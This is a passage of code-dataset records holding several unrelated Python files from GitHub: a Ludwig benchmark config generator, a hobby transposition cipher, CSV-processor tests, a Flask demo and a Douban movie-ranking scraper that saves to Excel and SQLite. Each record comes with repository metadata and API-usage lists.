"polygraphy.common.TensorMetadata", "line_number": 731, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 740, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 740, "usage_type": "name"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 742, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 751, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 751, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 768, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 768, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 772, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 772, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.ultra_verbose", "line_number": 781, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 781, "usage_type": "name"}]}
+{"seq_id": "42742917788", "text": "import logging\nimport os\nimport pdb\n\nfrom copy import deepcopy\n\nimport yaml\n\nimport globals\nfrom globals import *\nfrom lbt.utils.experiment_utils import load_yaml\n\ntemplate = load_yaml(CONFIG_TEMPLATE_FILE)\ndataset_metadata = load_yaml(DATASET_METADATA_FILE)\nhyperopt_config = load_yaml(HYPEROPT_CONFIG_FILE)\n\n\ndef insert_global_vars(config):\n \"\"\" replace global variable placeholders with respective values \"\"\"\n for key, value in config.items():\n if type(value) != dict and value in vars(globals):\n config[key] = getattr(globals, value)\n\n\ndef build_config_files():\n config_fps = {}\n config = deepcopy(template)\n\n encoder_hyperopt_vals = []\n # select relevant encoders\n for encoder_filename in globals.ENCODER_FILE_LIST:\n with open(os.path.join(ENCODER_CONFIG_DIR, encoder_filename)) as f:\n encoder_hyperopt_params = yaml.load(f, Loader=yaml.SafeLoader)\n encoder_hyperopt_vals.append(encoder_hyperopt_params)\n\n # select relevant datasets\n selected_datasets = {}\n for dataset_name in globals.DATASETS_LIST:\n if dataset_name in dataset_metadata.keys():\n selected_datasets[dataset_name] = dataset_metadata[dataset_name]\n else:\n raise ValueError(\n \"The dataset you provided is not available.\"\n \"Please see list of available datasets here: \"\n \"python experiment_drivery.py --h\"\n )\n\n config[\"hyperopt\"].update(hyperopt_config)\n\n for dataset, metadata in selected_datasets.items():\n # each dataset will have a model specific config file\n config_fps[dataset] = []\n\n for idx, input_feature_name in enumerate(metadata[\"input_features\"]):\n ipt_feat = deepcopy(config[\"input_features\"][0])\n ipt_feat[\"name\"] = input_feature_name[\"name\"]\n ipt_feat[\"type\"] = input_feature_name[\"type\"]\n if idx == 0:\n config[\"input_features\"] = [ipt_feat]\n else:\n config[\"input_features\"].append(ipt_feat)\n for idx, output_feature_info in enumerate(metadata[\"output_features\"]):\n out_feat = deepcopy(config[\"output_features\"][0])\n out_feat[\"name\"] = output_feature_info[\"name\"]\n out_feat[\"type\"] = output_feature_info[\"type\"]\n if idx == 0:\n config[\"output_features\"] = [out_feat]\n else:\n config[\"output_features\"].append(out_feat)\n\n if len(metadata[\"output_features\"]) > 1:\n config[\"hyperopt\"][\"output_feature\"] = \"combined\"\n else:\n config[\"hyperopt\"][\"output_feature\"] = metadata[\"output_features\"][\n 0\n ][\"name\"]\n\n input_feature_names = metadata[\"input_features\"]\n output_feature_names = metadata[\"output_features\"]\n\n for encoder_hyperopt_params in encoder_hyperopt_vals:\n curr_config = deepcopy(config)\n encoder_name = encoder_hyperopt_params[\"parameters\"][\n \"input_features.name.encoder\"\n ]\n\n # update input and output parameters (not preprocessing)\n for idx in range(len(curr_config[\"input_features\"])):\n curr_config[\"input_features\"][idx].update(\n encoder_hyperopt_params[\"input_features\"][idx]\n )\n insert_global_vars(curr_config[\"input_features\"][idx])\n\n for idx in range(len(curr_config[\"output_features\"])):\n if \"output_features\" in encoder_hyperopt_params.keys():\n curr_config[\"output_features\"][idx].update(\n encoder_hyperopt_params[\"output_features\"][idx]\n )\n insert_global_vars(curr_config[\"output_features\"][idx])\n\n # handle encoder specific preprocessing\n for idx in range(len(curr_config[\"input_features\"])):\n try:\n preprocessing = curr_config[\"input_features\"][idx][\n \"preprocessing\"\n ]\n for key, _ in preprocessing.items():\n preprocessing[key] = encoder_hyperopt_params[\n \"input_features\"\n ][idx][\"preprocessing\"][key]\n\n except:\n pass #no preprocessing param\n # handle encoder specific training params\n if \"training\" in encoder_hyperopt_params.keys():\n curr_config[\"training\"].update(\n encoder_hyperopt_params[\"training\"]\n )\n\n def input_or_output_feature(param_key):\n if param_key.split(\".\")[0] == \"input_features\":\n return True\n return False\n\n # handle encoder specific hyperopt\n input_encoder_hyperopt_params = {\n \"parameters\": {\n input_feat[\"name\"] + \".\" + key.split(\".\")[-1]: value\n for input_feat in input_feature_names\n for key, value in encoder_hyperopt_params[\n \"parameters\"\n ].items()\n if key.split(\".\")[-1] != \"encoder\"\n and input_or_output_feature(key)\n }\n }\n\n # handle encoder specific hyperopt\n output_encoder_hyperopt_params = {\n \"parameters\": {\n output_feat[\"name\"] + \".\" + key.split(\".\")[-1]: value\n for output_feat in output_feature_names\n for key, value in encoder_hyperopt_params[\n \"parameters\"\n ].items()\n if key.split(\".\")[-1] != \"encoder\"\n and not input_or_output_feature(key)\n }\n }\n\n ds_encoder_hyperopt_params = {\n \"parameters\": {\n **output_encoder_hyperopt_params[\"parameters\"],\n **input_encoder_hyperopt_params[\"parameters\"],\n }\n }\n curr_config[\"input_features\"][0][\"encoder\"] = encoder_name\n\n # populate hyperopt parameters w/encoder specific settings\n curr_config[\"hyperopt\"].update(\n {\n \"parameters\": {\n **ds_encoder_hyperopt_params[\"parameters\"],\n **hyperopt_config[\"parameters\"],\n }\n }\n )\n\n config_fp = os.path.join(\n EXPERIMENT_CONFIGS_DIR, f\"config_{dataset}_{encoder_name}.yaml\"\n )\n with open(config_fp, \"w\") as f:\n yaml.dump(curr_config, f)\n\n config_fps[dataset].append(config_fp)\n\n return config_fps\n", "repo_name": "HazyResearch/ludwig-benchmarking-toolkit", "sub_path": "lbt/build_def_files.py", "file_name": "build_def_files.py", "file_ext": "py", "file_size_in_byte": 6799, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 19, "dataset": "github-code", "pt": "53", "api": [{"api_name": "lbt.utils.experiment_utils.load_yaml", "line_number": 13, "usage_type": "call"}, {"api_name": "lbt.utils.experiment_utils.load_yaml", "line_number": 14, "usage_type": "call"}, {"api_name": "lbt.utils.experiment_utils.load_yaml", "line_number": 15, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 27, "usage_type": "call"}, {"api_name": "globals.ENCODER_FILE_LIST", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 33, "usage_type": "call"}, {"api_name": "yaml.SafeLoader", "line_number": 33, "usage_type": "attribute"}, {"api_name": "globals.DATASETS_LIST", "line_number": 38, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 55, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 63, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path", "line_number": 169, "usage_type": "attribute"}, {"api_name": "yaml.dump", "line_number": 173, "usage_type": "call"}]}
+{"seq_id": "70111771687", "text": "\"\"\"\r\nThe python code here implements a cipher that I am calling Randomness Hardened Double Transposition(RHDT)\r\n\r\n---LICENSE---\r\nThis program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.\r\n\r\nThis program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\r\n\r\nYou should have received a copy of the GNU General Public License along with this program. If not, see .\r\nCopyright cryptoam 2023\r\n\"\"\"\r\nimport secrets\r\n\r\ndef main():\r\n print(\"This is the RHDT tool\")\r\n print(\"All inputs must be uppercase letters with no symbols or spaces\")\r\n print(\"Program is liable to crash or malfunction if invalid input is provided\")\r\n exit_enable=False\r\n while exit_enable==False:\r\n mode=input(\"Encrypt(E) or Decrypt(D) or Exit(EXIT)?\\n--->\")\r\n if mode==\"E\":\r\n encrypt_mode()\r\n elif mode==\"D\":\r\n decrypt_mode()\r\n elif mode==\"EXIT\":\r\n exit_enable=True\r\n else:\r\n print(\"Invalid entry, try again\")\r\n input(\"Press enter to end program\")\r\n\r\ndef encrypt_mode():\r\n print(\"In encryption mode now\")\r\n plaintext=input(\"What is the plaintext?\\n--->\")\r\n key1=input(\"What is the first key?\\n--->\")\r\n key2=input(\"What is the second key?\\n--->\")\r\n print(\"Plaintext is: \"+plaintext)\r\n print(\"Key 1 is: \"+key1)\r\n print(\"Key 2 is: \"+key2)\r\n preprocessed_plaintext=preprocess_forward(plaintext)\r\n ciphertext=double_transpose_encrypt(preprocessed_plaintext, key1, key2)\r\n print(\"Ciphertext is: \"+ciphertext)\r\n\r\ndef decrypt_mode():\r\n print(\"In decryption mode now\")\r\n ciphertext=input(\"What is the ciphertext?\\n--->\")\r\n key1=input(\"What is the first key?\\n--->\")\r\n key2=input(\"What is the second key?\\n--->\")\r\n print(\"Ciphertext is: \"+ciphertext)\r\n print(\"Key 1 is: \"+key1)\r\n print(\"Key 2 is: \"+key2)\r\n preprocessed_plaintext=double_transpose_decrypt(ciphertext, key1, key2)\r\n plaintext=preprocess_backward(preprocessed_plaintext)\r\n print(\"Plaintext is: \"+plaintext)\r\n\r\ndef preprocess_forward(plaintext):\r\n # Convert the plaintext into a stream of 0-25\r\n plaintext_stream=[]\r\n for char in plaintext:\r\n num=ord(char)-ord(\"A\")\r\n plaintext_stream.append(num)\r\n # Obtain an actually random(read: unpredictable to adversary) stream of 0-25\r\n random_stream=[]\r\n for i in range(len(plaintext_stream)):\r\n random_num=secrets.randbelow(26)\r\n random_stream.append(random_num)\r\n # Now start crossing the streams\r\n # :P\r\n preprocessed_stream=[]\r\n for i in range(len(plaintext_stream)):\r\n char_num=plaintext_stream[i]\r\n random_num=random_stream[i]\r\n a=((2*char_num)+random_num)%26\r\n b=(char_num+random_num)%26\r\n preprocessed_stream.append(a)\r\n preprocessed_stream.append(b)\r\n # Convert the numbers in the preprocessed stream back into letters\r\n preprocessed_plaintext=\"\"\r\n for num in preprocessed_stream:\r\n char=chr(num+ord(\"A\"))\r\n preprocessed_plaintext=preprocessed_plaintext+char\r\n return(preprocessed_plaintext)\r\n\r\ndef preprocess_backward(preprocessed_plaintext):\r\n # Convert the preprocessed plaintext into a stream of 0-25\r\n number_stream=[]\r\n for char in preprocessed_plaintext:\r\n num=ord(char)-ord(\"A\")\r\n number_stream.append(num)\r\n # Convert the stream of numbers into a stream of tuples (a,b)\r\n tuple_stream=[]\r\n for i in range(0, len(number_stream), 2):\r\n tuple_stream.append((number_stream[i],number_stream[i+1]))\r\n # Now we process each tuple to recover the plaintext number\r\n plaintext_stream=[]\r\n for tup in tuple_stream:\r\n a=tup[0]\r\n b=tup[1]\r\n c=a-b\r\n if c<0:\r\n plaintext_num=c+26\r\n else:\r\n plaintext_num=c\r\n plaintext_stream.append(plaintext_num)\r\n # Finally recover the plaintext from the stream of 0-25\r\n plaintext=\"\"\r\n for num in plaintext_stream:\r\n char=chr(num+ord(\"A\"))\r\n plaintext=plaintext+char\r\n return(plaintext)\r\n\r\ndef transpose_encrypt(plaintext, key):\r\n columns = len(key)\r\n rows = (len(plaintext) + columns - 1) // columns\r\n grid = []\r\n # Create a grid for the plaintext\r\n for i in range(rows):\r\n a = []\r\n for j in range(columns):\r\n a.append(\"\")\r\n grid.append(a)\r\n # Fill the grid with the plaintext\r\n index = 0\r\n for row in range(rows):\r\n for col in range(columns):\r\n if index < len(plaintext):\r\n grid[row][col] = plaintext[index]\r\n index=index+1\r\n else:\r\n grid[row][col]=\"$\"\r\n # Sort the columns based on the key\r\n sorted_columns = [col for col in range(columns)]\r\n sorted_columns.sort(key=lambda x: key[x])\r\n # Create a new grid\r\n new_grid=[]\r\n for i in range(rows):\r\n a = []\r\n for j in range(columns):\r\n a.append(\"\")\r\n new_grid.append(a)\r\n # Fill in the new grid according the the sorted collum\r\n for row in range(rows):\r\n for col in range(columns):\r\n new_grid[row][col]=grid[row][sorted_columns[col]]\r\n # Extract the ciphertext from the new grid using the sorted columns \r\n ciphertext = \"\"\r\n for row in range(rows):\r\n for col in range(columns):\r\n char=new_grid[row][col]\r\n if char==\"$\":\r\n pass\r\n else:\r\n ciphertext=ciphertext+char\r\n return (ciphertext)\r\n\r\ndef transpose_decrypt(ciphertext, key):\r\n columns = len(key)\r\n rows = (len(ciphertext) + columns - 1) // columns\r\n grid = []\r\n # Create a grid for the ciphertext\r\n for i in range(rows):\r\n a = []\r\n for j in range(columns):\r\n a.append(\"\")\r\n grid.append(a)\r\n # Sort the columns based on the key\r\n sorted_columns = [col for col in range(columns)]\r\n sorted_columns.sort(key=lambda x: key[x])\r\n # Fill in the grid for the full rows\r\n index = 0\r\n for row in range(rows-1):\r\n for col in range(columns):\r\n if index < len(ciphertext):\r\n grid[row][col] = ciphertext[index]\r\n index=index+1\r\n # We need to be careful now\r\n # The last row is not garunteed to be full, must now perform a check\r\n a=(len(ciphertext)%columns)\r\n if a==0:\r\n # We do not need to worry, we can just carry on\r\n # The length of the ciphertext is a multiple of the key, there will not be mismatched column lengths\r\n for col in range(columns):\r\n grid[rows-1][col]=ciphertext[index]\r\n index=index+1\r\n else:\r\n # Turns out we do need to worry, column lengths will be mismatched\r\n for col in range(columns):\r\n current_collum_index=sorted_columns[col]\r\n if current_collum_index>=a:\r\n #We are writing to a column that does not have a character, pad it instead\r\n grid[rows-1][col]=\"$\"\r\n else:\r\n grid[rows-1][col]=ciphertext[index]\r\n index=index+1\r\n new_grid=[]\r\n for i in range(rows):\r\n a = []\r\n for j in range(columns):\r\n a.append(\"\")\r\n new_grid.append(a)\r\n # Copy characters over to the new grid but this time with the collumns in the right place\r\n index=0\r\n for col in sorted_columns:\r\n for row in range(rows):\r\n char=grid[row][index]\r\n new_grid[row][col]=char\r\n index=index+1\r\n # Extract the plaintext from the grid\r\n plaintext=\"\"\r\n for row in range(rows):\r\n for col in range(columns):\r\n char=new_grid[row][col]\r\n if char==\"$\":\r\n pass #padding, ignore and move on to the next one\r\n else:\r\n plaintext=plaintext+char\r\n return(plaintext)\r\n\r\ndef double_transpose_encrypt(plaintext, key1, key2):\r\n partial_encrypt=transpose_encrypt(plaintext, key1)\r\n ciphertext=transpose_encrypt(partial_encrypt, key2)\r\n return(ciphertext)\r\n\r\ndef double_transpose_decrypt(ciphertext, key1, key2):\r\n partial_decrypt=transpose_decrypt(ciphertext, key2)\r\n plaintext=transpose_decrypt(partial_decrypt, key1)\r\n return(plaintext)\r\n\r\nif __name__==\"__main__\":\r\n main()", "repo_name": "cryptoam322/RHDT-cipher", "sub_path": "RDHT-cipher_final.py", "file_name": "RDHT-cipher_final.py", "file_ext": "py", "file_size_in_byte": 8587, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "secrets.randbelow", "line_number": 64, "usage_type": "call"}]}
+{"seq_id": "24775054719", "text": "import pytest\nimport csv\nimport mock\nfrom unittest.mock import patch\nimport os\nfrom ..DataFile import Metadata, DataFile, Relation, _convert_string_to_number\n\nMANUFACTURER_VALUES = {\"Toyota\": 2, \"Volkswagon\": 1, \"Ferrari\": 1}\nMODEL_VALUES = {\"Camry\": 1, \"GTI\": 1, \"Corolla\": 1, \"Dino 246 GT\": 1}\nCOLOR_VALUES = {\"Gray\": 1, \"White\": 1, \"Black\": 1, \"Red\": 1}\nCOST_QUANT_VALUES = [\"$15,000\", \"$20,000\", \"$10,000\"]\nCOST_QUAL_VALUES = {\"N.A.\": 1}\nMPG_VALUES = [25.4, 23.2, 28.2, 18.2]\nEMPTY_VALUES = {}\n'''\nReturn a very simple, fake CSV file for testing\n'''\n@pytest.fixture()\ndef simple_csv():\n data = (\n 'Manufacturer,Model,Color,Miles,MPG,Cost\\n'\n 'Toyota,Camry,Gray,\"75,000\",\"25.4\",\"$15,000\"\\n'\n 'Volkswagon,GTI,White,\"75,000\",\"23.2\",\"$20,000\"\\n'\n 'Toyota,Corolla,Black,\"100,000\",\"28.2\",\"$10,000\"\\n'\n 'Ferrari,Dino 246 GT,Red,\"252,346\",\"18.2\",N.A.\\n'\n )\n return mock.mock_open(read_data=data)\n\ndef create_simple_csv(file_name=\"../test_data/simple.csv\"):\n data = [\n ['Manufacturer','Model','Color','Miles','MPG','Cost'],\n ['Toyota','Camry','Gray','75,000','25.4','$15,000'],\n ['Volkswagon','GTI','White','75,000','23.2','$20,000'],\n ['Toyota','Corolla','Black','100,000','28.2','$10,000'],\n ['Ferrari','Dino 246 GT','Red','252,346','18.2','N.A.'],\n ]\n if not os.path.isfile(file_name):\n test_file = open(file_name, \"w\", newline=\"\\n\")\n writer = csv.writer(test_file)\n writer.writerows(data)\n test_file.close()\n\n@pytest.fixture()\ndef update_cost_csv():\n data = (\n 'Manufacturer,Model,Color,Miles,MPG,Cost\\n'\n 'Toyota,Camry,Gray,\"75,000\",25.4,\"$15,000\"\\n'\n 'Volkswagon,GTI,White,\"75,000\",23.2,\"$20,000\"\\n'\n 'Toyota,Corolla,Black,\"100,000\",28.2,\"$10,000\"\\n'\n 'Ferrari,Dino 246 GT,Red,\"252,346\",18.2,-1\\n'\n )\n return mock.mock_open(read_data=data)\n\n@pytest.fixture()\ndef update_miles_csv():\n data = (\n 'Manufacturer,Model,Color,Miles,MPG,Cost\\n'\n 'Toyota,Camry,Gray,\"76,000\",25.4,\"$15,000\"\\n'\n 'Volkswagon,GTI,White,\"75,000\",23.2,\"$20,000\"\\n'\n 'Toyota,Corolla,Black,\"100,000\",28.2,\"$10,000\"\\n'\n 'Ferrari,Dino 246 GT,Red,\"252,346\",18.2,N.A.\\n'\n )\n return mock.mock_open(read_data=data)\n\n'''\nBuild a test string for the metadata\n'''\ndef build_metadata_string(number, name, datatype, qual_values:dict, quant_values:list):\n string = f\"\\n datatype:{datatype}\"\n if qual_values:\n string = string + f\"; qual_values_count:{len(qual_values.keys())}\"\n if quant_values:\n string = string + f\"; quant_values_count:{len(quant_values)}\"\n if qual_values:\n string = string + f\"\\nQualitative Values ['Value': count]: {qual_values}\"\n return string\n\n'''\nTest validity of metadata object\n'''\ndef run_metadata_asserts(metadata, number, name, correct_qual_values:dict, quant_count, datatype):\n assert(metadata.name == name)\n assert(metadata.number == number)\n assert(metadata.qualitative_values == correct_qual_values)\n assert(metadata.datatype == datatype)\n assert(metadata.quantitative_values_count == quant_count)\n return True\n\n'''\nTest init to:\n\n-Make sure that column titles are added as attributes\n-Make sure data populates correctly\n'''\ndef test_init(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n\n assert(run_metadata_asserts(test_file.Manufacturer, 0, \"Manufacturer\", MANUFACTURER_VALUES, 0, \"qualitative\"))\n assert(run_metadata_asserts(test_file.Model, 1, \"Model\", MODEL_VALUES, 0, \"qualitative\"))\n assert(run_metadata_asserts(test_file.Color, 2, \"Color\", COLOR_VALUES, 0, \"qualitative\"))\n assert(run_metadata_asserts(test_file.Miles, 3, \"Miles\", EMPTY_VALUES, 4, \"quantitative\"))\n assert(run_metadata_asserts(test_file.MPG, 4, \"MPG\", EMPTY_VALUES, 4, \"quantitative\"))\n assert(run_metadata_asserts(test_file.Cost, 5, \"Cost\", {\"N.A.\": 1}, 3, \"both\"))\n\ndef test_create_file(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n alt_file = DataFile.create(\"../test_data/Data.csv\")\n\n assert(test_file == alt_file)\n\ndef test_show_metadata_qual_data(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n\n MANUFACTURER_META_REPORT = build_metadata_string(0, \"Manufacturer\", \"qualitative\", MANUFACTURER_VALUES, EMPTY_VALUES)\n manufacturer_report = test_file.show_metadata(\"Manufacturer\")\n assert(MANUFACTURER_META_REPORT == manufacturer_report)\n\ndef test_show_metadata_quant_data(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n\n MPG_META_REPORT = build_metadata_string(4, \"MPG\", \"quantitative\", EMPTY_VALUES, MPG_VALUES)\n MPG_report = test_file.show_metadata(\"MPG\")\n assert(MPG_META_REPORT == MPG_report)\n\ndef test_show_metadata_both_data(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n\n COST_META_REPORT = build_metadata_string(5, \"Cost\", \"both\", COST_QUAL_VALUES, COST_QUANT_VALUES)\n cost_report = test_file.show_metadata(\"Cost\")\n assert(COST_META_REPORT == cost_report)\n\ndef test_update_column_value_no_kwargs(update_cost_csv):\n test_file = \"../test_data/simple.csv\"\n create_simple_csv(test_file)\n destination_file = \"update_column_test.csv\"\n data_file = DataFile(test_file)\n data_file.update_value(\"N.A.\", -1,\"Cost\", new_file_name=destination_file)\n test_file = open(\"../test_data/\" + destination_file, \"r\")\n with patch(\"builtins.open\", update_cost_csv):\n with open(\"../test_data/simple.csv\", \"r\") as correct_file:\n test_lines = test_file.readlines()\n for test_line in test_lines:\n correct_line = correct_file.readline()\n #print(test_line)\n #print(correct_line)\n assert(test_line == correct_line)\n test_file.close()\n os.remove(\"../test_data/\" + destination_file)\n os.remove(\"../test_data/simple.csv\")\n\ndef test_update_column_value_kwargs(update_miles_csv):\n test_file = \"../test_data/simple.csv\"\n create_simple_csv(test_file)\n destination_file = \"update_column_test.csv\"\n data_file = DataFile(test_file)\n data_file.update_value(75000, 76000,\"Miles\", new_file_name=destination_file, Model=\"Camry\")\n test_file = open(\"../test_data/\" + destination_file, \"r\")\n with patch(\"builtins.open\", update_miles_csv):\n with open(\"../test_data/simple.csv\", \"r\") as correct_file:\n test_lines = test_file.readlines()\n for test_line in test_lines:\n correct_line = correct_file.readline()\n #print(test_line)\n #print(correct_line)\n assert(test_line.replace(\",\", \"\").replace(\"$\", \"\").replace('\"', \"\") == correct_line.replace(\",\", \"\").replace(\"$\", \"\").replace('\"', \"\"))\n test_file.close()\n os.remove(\"../test_data/\" + destination_file)\n os.remove(\"../test_data/simple.csv\")\n\n\n\n", "repo_name": "DevinDuval09/csv_processor", "sub_path": "csv_processor/tests/DataFileTests.py", "file_name": "DataFileTests.py", "file_ext": "py", "file_size_in_byte": 7177, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "mock.mock_open", "line_number": 27, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 39, "usage_type": "call"}, {"api_name": "mock.mock_open", "line_number": 52, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 43, "usage_type": "call"}, {"api_name": "mock.mock_open", "line_number": 63, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 54, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 97, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 108, "usage_type": "call"}, {"api_name": "DataFile.DataFile.create", "line_number": 109, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 109, "usage_type": "name"}, {"api_name": "DataFile.DataFile", "line_number": 115, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 123, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 131, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 141, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 144, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 153, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 154, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 160, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 163, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 172, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 173, "usage_type": "call"}]}
+{"seq_id": "5508335903", "text": "# https://blog.miguelgrinberg.com/post/the-flask-mega-tutorial-part-ii-templates\n\nfrom flask import render_template\nfrom flask import Flask\napp = Flask(__name__)\n\n\n@app.route('/')\n@app.route('/')\ndef index(name):\n user = {'username': name}\n return render_template('index.html', title='Great!', user=user)\n", "repo_name": "umbcdata601/spring2020", "sub_path": "jupyter_notebooks/week_05_automation/flask_demo/html_from_template/my_flask.py", "file_name": "my_flask.py", "file_ext": "py", "file_size_in_byte": 317, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "71373161448", "text": "# https://movie.douban.com/top250\n# 爬取豆瓣电影Top250的基本信息, 包括电源的名称, 豆瓣评分, 评价数, 电影概况, 电影链接等.\n\n# coding=utf-8\nfrom bs4 import BeautifulSoup # 网页解析, 获取数据\nimport re # 正则表达式, 进行文字匹配\nimport urllib.request, urllib.error # 指定URL, 获取网页数据\nimport xlwt # 进行excel操作\nimport sqlite3 # 进行SQLite数据库操作\n\ndef main():\n baseurl = 'https://movie.douban.com/top250?start='\n # 1.爬取网页\n data_list = getData(baseurl)\n print(data_list)\n print(len(data_list))\n # print(len(data_list))\n save_path = './moviesTop250.xls'\n # 3.保存数据\n # saveData(save_path, data_list)\n saveDataToSQlite(data_list, 'movieTop250')\n\n\ndef askURL(url):\n # 伪装成浏览器\n head = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.30\",\n \"Referer\": url\n }\n request = urllib.request.Request(url=url, headers=head)\n html = \"\"\n try:\n response = urllib.request.urlopen(request)\n html = response.read().decode('utf-8')\n # print(html)\n except urllib.error.URLError as e:\n print(e)\n return html\n\n# 正则表达式\nsuper_link = re.compile(r'') # 爬取超链接\nimg_link = re.compile(r'', re.S) # 爬取图片链接 re.S让换行符包含在连接中\ntitle = re.compile(r'(.*?) ') # 电影名\nrate = re.compile(r'(.*?) ') # 电影评分\njudge = re.compile(r'(.*?)人评价 ') # 评价人数\ninq = re.compile(r'(.*?) ') # 电影概况\nBd = re.compile(r'(.*?)
', re.S) # 相关内容\n\n\n\ndef getData(baseurl):\n data_list = []\n for i in range(10):\n url = baseurl + str(i * 25)\n html = askURL(url)\n # 逐一解析网页\n soup = BeautifulSoup(html, 'html.parser')\n for item in soup.find_all('div', class_='item'):\n data = [] # 保存一部电影的所有信息\n item = str(item)\n # print(item)\n link = re.findall(super_link, item)[0] # 通过正侧表达式查找指定的字符串\n # print(link)\n data.append(link)\n data.append(re.findall(img_link, item)[0])\n data.append(re.findall(title, item)[0])\n data.append(re.findall(rate, item)[0])\n data.append(re.findall(judge, item)[0])\n data.append(\"\" if re.findall(inq, item) == [] else re.findall(inq, item)[0]) # 有可能为空\n data.append(re.findall(Bd, item)[0].replace(\" \", \"\"))\n\n data_list.append(data)\n\n return data_list\n\ndef saveData(save_path, data_list):\n workbook = xlwt.Workbook(encoding='utf-8') # 创建workbook对象\n worksheet = workbook.add_sheet('sheet1') # 创建工作表\n col = [\"电影详情链接\", \"图���链接\", \"中文名\", \"评分\", \"评价人数\", \"概况\", \"其他信息\"]\n for i in range(7):\n worksheet.write(0, i, col[i])\n for i in range(len(data_list)):\n for j in range(len(data_list[0])):\n worksheet.write(i+1, j, data_list[i][j])\n workbook.save(save_path)\n\ndef init_SQLite(dbpath):\n import sqlite3\n\n conn = sqlite3.connect(dbpath) # 打开或创建数据库文件\n print(\"Opened database successfully.\")\n\n cursor = conn.cursor() # 获取游标\n sql = ''' \n create table moviesTop250(\n id integer primary key autoincrement,\n super_link text not null,\n img_link text not null,\n name varchar not null,\n score numeric,\n num numeric,\n instroduction text,\n info text\n ) \n '''\n\n cursor.execute(sql)\n conn.commit() # 提交数据库操作\n\ndef saveDataToSQlite(data_list, dbpath):\n init_SQLite(dbpath)\n conn = sqlite3.connect(dbpath)\n cursor = conn.cursor()\n\n id = 1\n for data in data_list:\n # 拼写数据\n for index in range(len(data)):\n data[index] = '\"' + data[index] + '\"'\n sql = '''\n insert into moviesTop250 (\n id, super_link, img_link, name, score, num, instroduction, info)\n values (%s)\n '''%(f'\"{id}\",' + \",\".join(data))\n # print(sql)\n cursor.execute(sql)\n conn.commit()\n id += 1\n\n conn.close()\n\n\nif __name__ == '__main__':\n # askURL('https://baidu.com')\n main()", "repo_name": "yruns/Web_Crawler", "sub_path": "Moives/Movies.py", "file_name": "Movies.py", "file_ext": "py", "file_size_in_byte": 4653, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "urllib.request.request.Request", "line_number": 30, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 30, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 30, "usage_type": "name"}, {"api_name": 